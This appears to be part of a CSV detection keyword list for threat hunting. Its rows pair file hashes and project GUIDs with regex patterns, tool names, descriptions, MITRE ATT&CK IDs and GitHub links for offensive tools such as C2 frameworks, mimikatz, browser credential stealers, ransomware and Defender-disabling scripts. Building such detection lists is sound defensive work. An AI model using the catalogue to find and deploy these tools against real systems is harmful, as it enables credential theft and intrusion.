"*d0d03a0ae4722535a0e1d5d0c8385ce42015511e68d960fadef4b4eaf5942feb*",".{0,1000}d0d03a0ae4722535a0e1d5d0c8385ce42015511e68d960fadef4b4eaf5942feb.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","39392" "*d0d44151ff0e68bd7ec125589185f2a056d0424a65c49b5a23a7633762884733*",".{0,1000}d0d44151ff0e68bd7ec125589185f2a056d0424a65c49b5a23a7633762884733.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39394" "*D0DF8E42-3CED-4A5F-BB28-0C348B56BC79*",".{0,1000}D0DF8E42\-3CED\-4A5F\-BB28\-0C348B56BC79.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","39397" "*d0eb83464046e448c2cc8681cbcc6de557c539fd307ce46a5734dfbfe6b7be69*",".{0,1000}d0eb83464046e448c2cc8681cbcc6de557c539fd307ce46a5734dfbfe6b7be69.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39399" "*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*",".{0,1000}d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","39400" "*d0ec66b90af2a1a10aacf8c8130d88cc0886235d5e74df5f504d01f9e4173a93*",".{0,1000}d0ec66b90af2a1a10aacf8c8130d88cc0886235d5e74df5f504d01f9e4173a93.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39401" "*d0f189f26ac306b46efc221359e27629eb76c54a4cf0cec4e3731ab306bee0af*",".{0,1000}d0f189f26ac306b46efc221359e27629eb76c54a4cf0cec4e3731ab306bee0af.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","39402" "*d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8*",".{0,1000}d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - 
T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","39404" "*d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8*",".{0,1000}d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","39405" "*d0ff7aed5b06c8bc511a222be3c1f6fe145b253b2fa4ffe62d72e5479f5a918e*",".{0,1000}d0ff7aed5b06c8bc511a222be3c1f6fe145b253b2fa4ffe62d72e5479f5a918e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39406" "*d101dd8673efe4f892eaf2124dc57be97140bdab7b2f79f8180ca6869a1eef3f*",".{0,1000}d101dd8673efe4f892eaf2124dc57be97140bdab7b2f79f8180ca6869a1eef3f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","39407" "*d1028ca3bb682ecbf66fcad2425aa322cf5214f6e123a145695047a03ec762a2*",".{0,1000}d1028ca3bb682ecbf66fcad2425aa322cf5214f6e123a145695047a03ec762a2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - 
T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39408" "*d10833b7d54745c35eec76ce48c1d8a4d90a9455bcd8b81cacdc95b9304b3be3*",".{0,1000}d10833b7d54745c35eec76ce48c1d8a4d90a9455bcd8b81cacdc95b9304b3be3.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","#filehash","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","39410" "*d10af443de7fe12f8aa50bc39d5e86d25ff8b789bf8763a61f9f84cf97bd0f53*",".{0,1000}d10af443de7fe12f8aa50bc39d5e86d25ff8b789bf8763a61f9f84cf97bd0f53.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","39411" "*d10b6cff8410fa9d9a9d9253c19fe6968fa5ca8f0de3b496648368e07b468a20*",".{0,1000}d10b6cff8410fa9d9a9d9253c19fe6968fa5ca8f0de3b496648368e07b468a20.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39412" "*D116BEC7-8DEF-4FCE-BF84-C8504EF4E481*",".{0,1000}D116BEC7\-8DEF\-4FCE\-BF84\-C8504EF4E481.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of 
Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","#GUIDproject","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","39414" "*d135953447b64497e94928624cc0d3b6e42f32673a4cd53215f0ae6861129f99*",".{0,1000}d135953447b64497e94928624cc0d3b6e42f32673a4cd53215f0ae6861129f99.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","39420" "*d13f87b9eaf09ef95778b2f1469aa34d03186d127c8f73c73299957d386c78d1*",".{0,1000}d13f87b9eaf09ef95778b2f1469aa34d03186d127c8f73c73299957d386c78d1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","39421" "*d14078723dbc8e252596c6528cee47eb889bf38f29bc69d04e23634ece8c2b2d*",".{0,1000}d14078723dbc8e252596c6528cee47eb889bf38f29bc69d04e23634ece8c2b2d.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","39422" "*d1439c78d82d7d5cb4c2eb3ff130ebe381ab5bb0eeaf369a02abc16e61ea7eca*",".{0,1000}d1439c78d82d7d5cb4c2eb3ff130ebe381ab5bb0eeaf369a02abc16e61ea7eca.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39424" "*d14447f41d11e0ed192d9161a60cee139fe8b01d921bbdff56abc01a5a653161*",".{0,1000}d14447f41d11e0ed192d9161a60cee139fe8b01d921bbdff56abc01a5a653161.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39425" 
"*d14447f41d11e0ed192d9161a60cee139fe8b01d921bbdff56abc01a5a653161*",".{0,1000}d14447f41d11e0ed192d9161a60cee139fe8b01d921bbdff56abc01a5a653161.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39426" "*d14884d8a7f74e96a4450e1b1e65636b3a2810274963e4a6eb28e161effe1216*",".{0,1000}d14884d8a7f74e96a4450e1b1e65636b3a2810274963e4a6eb28e161effe1216.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","39428" 
"*d14884d8a7f74e96a4450e1b1e65636b3a2810274963e4a6eb28e161effe1216*",".{0,1000}d14884d8a7f74e96a4450e1b1e65636b3a2810274963e4a6eb28e161effe1216.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#filehash","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","39429" "*d14b86691ed977fd4c29e0c98bac637bffc86c46e83768f73432eb26def0bcaa*",".{0,1000}d14b86691ed977fd4c29e0c98bac637bffc86c46e83768f73432eb26def0bcaa.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39430" "*d14be0c5477fc937b2cc00367931e1181d8897ce98a560cff48e0939840a096b*",".{0,1000}d14be0c5477fc937b2cc00367931e1181d8897ce98a560cff48e0939840a096b.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","0","#filehash","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","39431" "*d15d3424eed0a69503213f2c7261d831f676b51383f4a10924bee81ce0e47d49*",".{0,1000}d15d3424eed0a69503213f2c7261d831f676b51383f4a10924bee81ce0e47d49.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","39432" "*d162ba6606bbb0ac0485c82b28cfa68132769c8c19fc92cc65b3aa2f8deafe87*",".{0,1000}d162ba6606bbb0ac0485c82b28cfa68132769c8c19fc92cc65b3aa2f8deafe87.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39433" "*d162d2e96da627fac5a93d5e6faf379aff092bbd*",".{0,1000}d162d2e96da627fac5a93d5e6faf379aff092bbd.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","39434" "*d163f8bb6aef4d8acca03431abdee92c3d104b2ae7dea5082d1a6b579e05dc77*",".{0,1000}d163f8bb6aef4d8acca03431abdee92c3d104b2ae7dea5082d1a6b579e05dc77.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39435" "*d169a3057a62c9cc881c25e8f78c915c2c967a7c537a270239c87a1cad44b76e*",".{0,1000}d169a3057a62c9cc881c25e8f78c915c2c967a7c537a270239c87a1cad44b76e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39438" "*d16d7eaa9f5abcafb83da10a9b729f7c9b090bf209fd7b9ea820ed942c328d60*",".{0,1000}d16d7eaa9f5abcafb83da10a9b729f7c9b090bf209fd7b9ea820ed942c328d60.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","39439" "*d16e708e00f1d0138dea021571eed4ff2f2271ce937cd04adce602bbff805b8a*",".{0,1000}d16e708e00f1d0138dea021571eed4ff2f2271ce937cd04adce602bbff805b8a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39440" "*d172875534019a0aeebe70a021121ed7b5a21765d6d24838b5c639a1def0d59c*",".{0,1000}d172875534019a0aeebe70a021121ed7b5a21765d6d24838b5c639a1def0d59c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39442" "*d18597195b9b81b9e401547e4b630acf09ad39401bdcc8b5fa2e05e4677cf46f*",".{0,1000}d18597195b9b81b9e401547e4b630acf09ad39401bdcc8b5fa2e05e4677cf46f.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","39443" "*d18b648dfee767e09a9c580a9bd0c60edc5f9aa4718e41c15434c47630023efb*",".{0,1000}d18b648dfee767e09a9c580a9bd0c60edc5f9aa4718e41c15434c47630023efb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39444" "*d18c5c837e4bdfb76b6c4e6fa7ad0d6e583eec0cadf8184cd9297c77813337c2*",".{0,1000}d18c5c837e4bdfb76b6c4e6fa7ad0d6e583eec0cadf8184cd9297c77813337c2.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39446" "*d18e9a06ca8ad06c8b7178a31b1c6375031e75f08f3fb346a5fee42e2517ab88*",".{0,1000}d18e9a06ca8ad06c8b7178a31b1c6375031e75f08f3fb346a5fee42e2517ab88.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39447" "*d18fa52fdb740b1bbad14af154bffdd03ce7afadecf3df35b13e28a535f62067*",".{0,1000}d18fa52fdb740b1bbad14af154bffdd03ce7afadecf3df35b13e28a535f62067.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 
- T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39448" "*d19415ba5aa5fcb87bcf4c3185e5ccaf0da896ed49495ce5297d89e8ad7988e4*",".{0,1000}d19415ba5aa5fcb87bcf4c3185e5ccaf0da896ed49495ce5297d89e8ad7988e4.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","39451" "*D19BD978-267A-4BF0-85CC-851E280FF4C2*",".{0,1000}D19BD978\-267A\-4BF0\-85CC\-851E280FF4C2.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","39453" "*d1ac1450eece96c89d0721fb21e39d299b4157ea35b2d4ed8b91fbc766974101*",".{0,1000}d1ac1450eece96c89d0721fb21e39d299b4157ea35b2d4ed8b91fbc766974101.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","39456" "*D1AE1ACF-8AA2-4935-ACDF-EC22BAE2DF76*",".{0,1000}D1AE1ACF\-8AA2\-4935\-ACDF\-EC22BAE2DF76.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - 
TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","#GUIDproject","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","39457" "*d1b397d550d1f9921048c02b3401aeeaa070c99e5c369738834e01a6100c5396*",".{0,1000}d1b397d550d1f9921048c02b3401aeeaa070c99e5c369738834e01a6100c5396.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39458" "*d1b43d39823d14ec9524f63fa0125ad9606d5c3e32d8e10d34a25214c56d308f*",".{0,1000}d1b43d39823d14ec9524f63fa0125ad9606d5c3e32d8e10d34a25214c56d308f.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","39459" "*d1b7993dc84243e12f8b4650de9b71a85f5a3751c085d96f7211129c5e5f4eb0*",".{0,1000}d1b7993dc84243e12f8b4650de9b71a85f5a3751c085d96f7211129c5e5f4eb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39461" "*d1b8e13cf05c57e811ee4c90c985c018a7d1e937eca0f5860fecf36601032630*",".{0,1000}d1b8e13cf05c57e811ee4c90c985c018a7d1e937eca0f5860fecf36601032630.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39462" 